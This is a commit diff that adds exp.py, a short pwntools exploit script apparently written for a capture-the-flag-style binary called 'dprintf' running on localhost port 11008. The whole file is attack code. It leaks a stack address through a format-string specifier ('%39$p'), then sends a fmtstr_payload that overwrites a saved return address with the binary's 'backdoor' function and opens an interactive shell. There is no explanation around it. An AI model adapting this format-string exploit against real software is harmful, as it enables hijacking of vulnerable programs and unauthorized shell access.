henry-1.6-commit

2024-11-02 12:14:46 +08:00
parent f9c69cbd47
commit f2fc600fea
32 changed files with 3439 additions and 294 deletions
--- a/output/dprintf_patch/exp.py
+++ b/output/dprintf_patch/exp.py
@@ -0,0 +1,15 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+from pwn import *
+context.clear(arch='amd64', os='linux', log_level='info')
+
+elf = ELF('./dprintf')
+sh = remote('127.0.0.1', 11008)
+
+sh.sendline(b'%39$p')
+stack_addr = int(sh.recvline(), 16)
+success('stack_addr: ' + hex(stack_addr))
+sh.sendline(fmtstr_payload(7, {stack_addr - 0x48: p64(elf.sym['backdoor'])}))
+
+sh.interactive()